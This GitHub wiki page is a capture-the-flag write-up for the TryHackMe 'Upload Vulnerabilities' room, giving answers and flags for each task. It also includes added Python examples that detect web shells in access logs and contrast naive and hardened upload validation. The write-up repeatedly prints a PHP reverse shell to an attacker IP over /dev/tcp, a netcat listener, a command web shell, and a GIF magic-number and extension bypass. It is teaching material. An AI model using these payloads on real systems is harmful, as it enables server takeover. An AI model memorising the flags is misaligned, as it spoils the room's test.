THM Upload Vulnerabilities - grunt92/IT-Sec-WriteUps GitHub Wiki
Getting Started
Configure your hosts file for the task, as per the instructions above.
No answer needed
Introduction
Read and understand the above information.
No answer needed
General Methodology
Read the General Methodology
No answer needed
Overwriting Existing Files
What is the name of the image file which can be overwritten?
Follow the instructions of the room and go to overwrite.uploadvulns.thm. Inspect the site and you will see that the background image is stored under `images/mountains.jpg`.
mountains.jpg
Overwrite the image. What is the flag you receive?
Upload a new file named `mountains.jpg` to get the flag.
THM{OTBiODQ3YmNjYWZhM2UyMmYzZDNiZjI5}
Remote Code Execution
Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads?
/resources
Get either a web shell or a reverse shell on the machine.
What's the flag in the /var/www/ directory of the server?
Upload `<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");` as a php-file. Start a listener using `nc -lnvp PORT` and execute the script by accessing http://shell.uploadvulns.thm/resources/shell.php. After the reverse shell is opened you can get the flag by using `cat /var/www/flag.txt`.
THM{YWFhY2U3ZGI4N2QxNmQzZjk0YjgzZDZk}
Note: you can also use a webshell using `<?php system($_GET['cmd']); ?>` and get the flag using `http://shell.uploadvulns.thm/resources/shell.php?cmd=cat /var/www/flag.txt;`. But I prefer reverse shells (assuming that my actions are legal).
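The two shells above leave a recognisable trace in the web server's access log: a request for a server-side script inside a directory that should only hold uploaded images, optionally with a command parameter in the query string. The following detection logic is an added example, not part of the writeup or of the room; the log lines are constructed, and the upload directories, the list of executable extensions and the watched parameter names are assumptions to be adjusted per application.

```python
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Directories the room's sites serve uploads from (assumed list, extend per app).
UPLOAD_DIRS = ("/resources/", "/images/", "/graphics/", "/content/")
# Extensions a typical PHP handler configuration executes (assumed list).
EXECUTABLE_EXTS = frozenset({"php", "php3", "php4", "php5", "phtml", "phar"})
# Query parameter names commonly used by simple command web shells (assumed).
COMMAND_PARAMS = frozenset({"cmd", "command", "exec"})

# Constructed access-log lines in Apache "combined" format; not real traffic.
LOG_LINES = [
    '10.0.0.5 - - [12/Mar/2024:10:01:02 +0000] "POST /upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Mar/2024:10:01:09 +0000] "GET /resources/shell.php HTTP/1.1" 200 0 "-" "curl/7.88.1"',
    '10.0.0.5 - - [12/Mar/2024:10:01:20 +0000] "GET /resources/shell.php?cmd=id HTTP/1.1" 200 90 "-" "curl/7.88.1"',
    '10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /resources/mountains.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:02:05 +0000] "GET /images/logo.png HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields; None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_suspicious(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Flag requests for executable files under an upload directory and
    requests carrying a command-style query parameter."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        path = parts.path
        basename = path.rsplit("/", 1)[-1]
        ext = basename.rsplit(".", 1)[-1].lower() if "." in basename else ""
        reasons = []
        if path.startswith(UPLOAD_DIRS) and ext in EXECUTABLE_EXTS:
            reasons.append("exec_ext_in_upload_dir")
        if COMMAND_PARAMS & set(parse_qs(parts.query, keep_blank_values=True)):
            reasons.append("cmd_query_param")
        if reasons:
            alerts.append({"ip": rec["ip"], "path": path,
                           "status": rec["status"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious(LOG_LINES):
        print(alert)
```

A 200 response on such a request means the interpreter actually ran the file; a 404 on the same path is still worth a look, since it shows someone probing for an uploaded script. The same logic applies to the other sites in this room by extending `UPLOAD_DIRS`.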
Filtering
What is the traditionally predominant server-side scripting language?
php
When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?
whitelist
[Research] What MIME type would you expect to see when uploading a CSV file?
text/csv
Bypassing Client-Side Filtering
What is the flag in /var/www/?
Use gobuster to find out the directory where uploaded images are stored (/images). Open Burp Suite and change the interception options to intercept js-files as well. Visit java.uploadvulns.thm and intercept the request.
Note: you may have to reconfigure the target details, otherwise Burp Suite may try to intercept the site as https instead of http.
When intercepting the request make sure to instruct Burp Suite to also intercept the responses. When you go through the intercepted responses you can remove the "client-side-filter" script and the "firstload" script; once they have been sent to your device, deactivate the interception. Create a reverse shell using `<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");` and open a listener using `nc -lnvp PORT`. Upload the php-file and access it via java.uploadvulns.thm/images/shell.php and a remote shell will open. Once the shell is established use `cat /var/www/flag.txt` to access the flag.
THM{NDllZDQxNjJjOTE0YWNhZGY3YjljNmE2}
Bypassing Server-Side Filtering: File Extensions
What is the flag in /var/www/?
Use gobuster to enumerate the directories of the site. Go to http://annex.uploadvulns.thm/. Create a remote shell using `<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");` and save it as a .php5-file. Type in `select` to select the .php5-file and upload it using `upload`. After that move to http://annex.uploadvulns.thm/privacy. Start a listener using `nc -lnvp PORT` and select the uploaded file to start the reverse shell. Once the shell is established use `cat /var/www/flag.txt` to get the flag.
THM{MGEyYzJiYmI3ODIyM2FlNTNkNjZjYjFl}
Bypassing Server-Side Filtering: Magic Numbers
Grab the flag from /var/www/
Create a php remote shell using `AAAAAA <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");`. Open a hex editor and change the first 12 hex digits (the six bytes "41 41 41 41 41 41", i.e. the AAAAAA prefix) to "47 49 46 38 37 61" (the GIF87a magic number). Upload the file, start a listener using `nc -lnvp PORT` and access the file at http://magic.uploadvulns.thm/graphics/shell.php. In the shell use `cat /var/www/flag.txt` to get the flag.
THM{MWY5ZGU4NzE0ZDlhNjE1NGM4ZThjZDJh}
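The Overwriting Existing Files, Filtering, File Extensions and Magic Numbers sections each defeat one isolated check. Seen from the server side, they show what a single check buys and where it stops. The code below is an added example, not part of the writeup or of the room: it puts the naive checks (a blacklist of one extension, a "does it start with an image magic number" test) beside a hardened validator (extension whitelist, magic number of that specific type, server-chosen random file name that refuses to overwrite). The sample files are constructed and their bodies are inert placeholders.

```python
import secrets
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple

# Magic numbers of the image types the upload form is meant to accept.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXTENSIONS = frozenset(MAGIC)

# Constructed sample uploads modelled on the cases in the room. The "<?php"
# bodies are inert placeholders standing in for server-side code.
SAMPLES: Dict[str, bytes] = {
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,
    "shell.php": b"<?php /* placeholder */ ?>",
    "shell.php5": b"<?php /* placeholder */ ?>",            # alternate PHP extension
    "shell_gif.php5": b"GIF87a<?php /* placeholder */ ?>",  # GIF magic + PHP
    "shell_gif.gif": b"GIF87a<?php /* placeholder */ ?>",   # same bytes, image name
}


def extension_of(filename: str) -> str:
    """Last suffix, lower-cased, without the dot ('' if there is none)."""
    return Path(filename).suffix.lower().lstrip(".")


def naive_extension_filter(filename: str) -> bool:
    """Blacklist a single extension, as the 'annex' site does. Any other
    extension the server still hands to the PHP interpreter (.php5, ...) passes."""
    return extension_of(filename) != "php"


def naive_magic_filter(content: bytes) -> bool:
    """Accept anything that starts with *some* image magic number, as the
    'magic' site does. Six prefixed bytes are enough to pass."""
    return any(content.startswith(sig) for sigs in MAGIC.values() for sig in sigs)


def hardened_validate(filename: str, content: bytes) -> Optional[str]:
    """Whitelist the extension and require the magic number *of that type*.
    Returns the canonical extension to store under, or None to reject."""
    ext = extension_of(filename)
    if ext not in ALLOWED_EXTENSIONS:
        return None
    if not any(content.startswith(sig) for sig in MAGIC[ext]):
        return None
    return "jpg" if ext == "jpeg" else ext


def store_upload(content: bytes, ext: str, upload_dir: Path) -> Path:
    """Store under a server-chosen random name: the client can neither pick the
    name (so no overwriting mountains.jpg) nor know where the file landed, and
    mode 'xb' raises instead of replacing an existing file. upload_dir should
    live outside the web root, or at least have script execution disabled."""
    upload_dir.mkdir(parents=True, exist_ok=True)
    dest = upload_dir / f"{secrets.token_hex(16)}.{ext}"
    with open(dest, "xb") as fh:
        fh.write(content)
    return dest


def triage(samples: Dict[str, bytes] = SAMPLES) -> Dict[str, Tuple[bool, bool, bool]]:
    """Per sample: (passes extension blacklist, passes magic-only check, passes hardened check)."""
    return {
        name: (
            naive_extension_filter(name),
            naive_magic_filter(data),
            hardened_validate(name, data) is not None,
        )
        for name, data in samples.items()
    }


def store_demo() -> Tuple[bool, bool]:
    """Store identical bytes twice: names differ and neither write clobbers the other."""
    with tempfile.TemporaryDirectory() as tmp:
        first = store_upload(SAMPLES["photo.jpg"], "jpg", Path(tmp))
        second = store_upload(SAMPLES["photo.jpg"], "jpg", Path(tmp))
        return first != second, first.exists() and second.exists()


if __name__ == "__main__":
    for name, verdict in triage().items():
        print(f"{name:16} blacklist={verdict[0]!s:5} magic={verdict[1]!s:5} hardened={verdict[2]}")
    print("random, non-clobbering storage:", store_demo())
```

Note the last sample: a file that carries a valid GIF header and is named `.gif` passes even the hardened validator, because no content check can tell a real image from a file that merely begins like one. That is why the storage step matters as much as validation: files go under a random name into a directory the web server never executes scripts from, so whatever the bytes are, they are only ever served back as data.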
Example Methodology
Read the example methodology
No answer needed
Challenge
Hack the machine and grab the flag from /var/www/
Note: There is a complete walkthrough in the hints of the THM-task.
Visit the provided site and intercept your traffic; when your device requests "upload.js", intercept the response so you can manipulate the script. Remove the filter functionality regarding the file extension and magic numbers and forward the script to your device. Use gobuster to enumerate the directories of the site. By inspecting the background you can see that there is a "content" directory where the images are stored. Use gobuster and the provided "UploadVulnsList.txt" to enumerate the images of the "content" directory. Create a reverse shell using nodejs and save it as a .jpg-file. Upload the file and enumerate the files of the "content" directory again to determine where your file is stored. After you figure out where the file is stored you can access it. Make sure to have a listener running and go to the "admin" page of the site. There you can start your script using `../content/FILE.jpg`. When your reverse shell is established you can get the flag using `cat /var/www/flag.txt`.
THM{NzRlYTUwNTIzODMwMWZhMzBiY2JlZWU2}
Conclusion
Room completed, and hosts file reverted!
No answer needed